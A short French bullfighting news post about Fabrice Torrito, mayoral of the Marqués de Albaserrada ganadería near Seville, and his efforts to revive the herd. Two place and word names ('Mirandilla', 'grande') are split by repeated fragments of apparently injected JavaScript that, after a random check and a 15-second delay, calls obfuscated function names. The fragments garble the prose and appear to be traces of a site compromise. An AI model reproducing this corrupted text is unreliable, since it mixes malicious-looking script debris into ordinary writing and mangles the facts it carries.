DU NOUVEAU DANS LA GANADERIA MARQUES DE ALBASERADA

Fabrice Torrito est nîmois et s’est installé il y a près de 6 ans dans la finca Mirandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andilla, à Gerena près de Séville. Avec la totale confiance du ganadero, Fabrice est devenu mayoral et a entrepris de redonner vie à cet élevage historique.

Il a considérablement amélioré les structures. On y sélectionne le pedrajas et on a acheté des étalons repérés chez Isaías et Tulio Vázquez pour retrouver le type Tulio Vázquez. Cette année ce fer présente une corrida à Vergèze le 18 mai et une novillada à la feria de Parentis le 10 août.

Aujourd'hui Fabrice a surmonté les obstacles du début et se concentre désormais dans la sélection des bêtes, afin de redonner ses lettres de noblesse à l’élevage Marquis de Albaserrada. Avec une idée qui ne le quitte pas: voir bientôt ses toros sortir dans une grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande arène.

Photographies de bruno Lasnier

[simpleviewer gallery_id="22"]

Les commentaires sont fermés.